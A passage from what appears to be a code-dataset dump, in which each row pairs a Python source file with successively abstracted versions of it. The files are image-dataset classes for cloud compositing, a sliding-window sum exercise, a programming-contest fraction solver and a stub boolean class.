alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n <function token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n <function token>\n\n def __len__(self):\n return len(self.rgb)\n <function token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n <function token>\n <function token>\n <function token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n <function token>\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n <function token>\n <function token>\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n <function token>\n <function token>\n <function token>\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n <function token>\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIR2RGB(BaseTrain):\n <function token>\n <function token>\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIR2RGB(BaseTrain):\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n"
] | false |
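The steps shown above for the preceding entry are dataset classes whose core operation is alpha-compositing a random RGBA cloud image over an RGB image, then transposing HWC to CHW and rescaling to [-1, 1]. A minimal NumPy sketch of just that compositing step follows; the 256x256 shape and the random arrays are placeholders standing in for the cv2.imread results, not values from the dataset.

import numpy as np

def composite_cloud(rgb, cloud_rgba):
    # Standard "over" blend: weight the background by (1 - alpha) and the cloud by alpha.
    alpha = cloud_rgba[:, :, 3] / 255.0
    alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))
    out = (1.0 - alpha) * rgb + alpha * cloud_rgba[:, :, :3]
    return np.clip(out, 0.0, 255.0)

# Toy usage with random HWC float32 arrays in the 0-255 range.
rgb = np.random.rand(256, 256, 3).astype(np.float32) * 255.0
cloud = np.random.rand(256, 256, 4).astype(np.float32) * 255.0
clouded = composite_cloud(rgb, cloud)
chw = clouded.transpose(2, 0, 1) / 127.5 - 1.0  # HWC -> CHW, rescale to [-1, 1]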
99,894 | c731d4d8b71dcadc7627d645639d2515dcf904a0 | T = int(input())
for tc in range(T):
n, m = map(int, input().split())
num = list(map(int, input().split()))
num_sum = 0
ans = []
for i in range(n-m+1):
sum = 0
for j in range(m):
sum += num[j+i]
ans.append(sum)
print(f"#{tc+1} {max(ans) - min(ans)}") | [
"T = int(input())\n\nfor tc in range(T):\n n, m = map(int, input().split())\n\n num = list(map(int, input().split()))\n \n num_sum = 0\n ans = []\n for i in range(n-m+1):\n sum = 0\n for j in range(m):\n sum += num[j+i]\n ans.append(sum)\n print(f\"#{tc+1} {max(ans) - min(ans)}\")",
"T = int(input())\nfor tc in range(T):\n n, m = map(int, input().split())\n num = list(map(int, input().split()))\n num_sum = 0\n ans = []\n for i in range(n - m + 1):\n sum = 0\n for j in range(m):\n sum += num[j + i]\n ans.append(sum)\n print(f'#{tc + 1} {max(ans) - min(ans)}')\n",
"<assignment token>\nfor tc in range(T):\n n, m = map(int, input().split())\n num = list(map(int, input().split()))\n num_sum = 0\n ans = []\n for i in range(n - m + 1):\n sum = 0\n for j in range(m):\n sum += num[j + i]\n ans.append(sum)\n print(f'#{tc + 1} {max(ans) - min(ans)}')\n",
"<assignment token>\n<code token>\n"
] | false |
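The entry above recomputes each length-m window sum with a nested loop, which is O(n*m); the same max-minus-min answer can be read off prefix sums in O(n). A small sketch of that alternative, assuming the same list-of-integers input as the row above:

from itertools import accumulate

def window_sum_spread(nums, m):
    # prefix[i] holds sum(nums[:i]), so each window sum is a single subtraction.
    prefix = [0] + list(accumulate(nums))
    sums = [prefix[i + m] - prefix[i] for i in range(len(nums) - m + 1)]
    return max(sums) - min(sums)

# Agrees with the nested-loop version on a small case.
assert window_sum_spread([1, 2, 3, 4, 5], 2) == (4 + 5) - (1 + 2)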
99,895 | 74d31520b5f8feae1fe7df54100509c97f5ddfe3 | ##input = open('C-sample-input.txt', 'r')
##output = open('C-sample-output.txt', 'w')
#input = open('/Users/pruthvikarreddy/Downloads/test.in', 'r')
import math
input = open('A-small-attempt0 (2).in', 'r')
output = open('A-small.out', 'w')
##input = open('C-large.in', 'r')
##output = open('C-large.out', 'w')
def read_int():
return int(input.readline().strip())
def read_ints():
return [int(x) for x in input.readline().split()]
def read_frac():
return [int(x) for x in input.readline().split('/')]
def read_float():
return float(input.readline().strip())
def read_floats():
return [float(x) for x in input.readline().split()]
def read_floats():
return [float(x) for x in input.readline().split()]
def read_strs():
return [x for x in input.readline().split()]
def read_str():
return input.readline().strip()
def read_floats():
return input.readline().split()
def solve(N, perm):
return 'ans'
def main():
num_cases = read_int()
for case in range(1, num_cases+1):
t,b=read_frac()
lt,lb=math.log(t,2),math.log(b,2)
logs=lb-lt
if logs==int(logs) or lb==int(lb):
solution=int(math.ceil(logs))
else:
solution='impossible'
solution_string = "Case #%d: %s" %(case, solution)
output.write(solution_string + "\n")
print solution_string
if __name__=='__main__':
main()
input.close()
output.close()
| [
"##input = open('C-sample-input.txt', 'r')\n##output = open('C-sample-output.txt', 'w')\n#input = open('/Users/pruthvikarreddy/Downloads/test.in', 'r')\nimport math\ninput = open('A-small-attempt0 (2).in', 'r')\noutput = open('A-small.out', 'w')\n\n##input = open('C-large.in', 'r')\n##output = open('C-large.out', 'w')\n\ndef read_int():\n return int(input.readline().strip())\n\ndef read_ints():\n return [int(x) for x in input.readline().split()]\n \ndef read_frac():\n return [int(x) for x in input.readline().split('/')]\n\ndef read_float():\n return float(input.readline().strip())\n\ndef read_floats():\n return [float(x) for x in input.readline().split()]\n \ndef read_floats():\n return [float(x) for x in input.readline().split()]\n \ndef read_strs():\n return [x for x in input.readline().split()]\n\ndef read_str():\n return input.readline().strip()\n \ndef read_floats():\n return input.readline().split()\n\ndef solve(N, perm):\n return 'ans'\n\ndef main():\n num_cases = read_int()\n for case in range(1, num_cases+1):\n t,b=read_frac()\n lt,lb=math.log(t,2),math.log(b,2)\n logs=lb-lt\n if logs==int(logs) or lb==int(lb):\n solution=int(math.ceil(logs))\n else:\n solution='impossible'\n solution_string = \"Case #%d: %s\" %(case, solution)\n output.write(solution_string + \"\\n\")\n print solution_string\n \nif __name__=='__main__':\n main()\n input.close()\n output.close()\n \n"
] | true |
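The entry above is flagged error: true because `print solution_string` is Python 2 syntax, which is also why its steps column holds only the original source. A hedged Python 3 sketch of the same per-case computation, reading T and then one t/b fraction per line from stdin instead of the hard-coded contest files:

import math
import sys

def solve_case(t, b):
    # Same arithmetic as the row above: compare log2(b) - log2(t) against an integer.
    logs = math.log(b, 2) - math.log(t, 2)
    if logs == int(logs) or math.log(b, 2) == int(math.log(b, 2)):
        return int(math.ceil(logs))
    return 'impossible'

tokens = sys.stdin.read().split()
for case in range(1, int(tokens[0]) + 1):
    t, b = (int(x) for x in tokens[case].split('/'))
    print('Case #%d: %s' % (case, solve_case(t, b)))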
99,896 | eac02e22edb433e7df9d234144c815eb8cd8cb25 | # coding: utf-8
class boolOperator:
def __init__(self, expression):
self.expression = expression
def compute(self):
pass | [
"# coding: utf-8\nclass boolOperator:\n def __init__(self, expression):\n self.expression = expression\n\n def compute(self):\n pass",
"class boolOperator:\n\n def __init__(self, expression):\n self.expression = expression\n\n def compute(self):\n pass\n",
"class boolOperator:\n\n def __init__(self, expression):\n self.expression = expression\n <function token>\n",
"class boolOperator:\n <function token>\n <function token>\n",
"<class token>\n"
] | false |
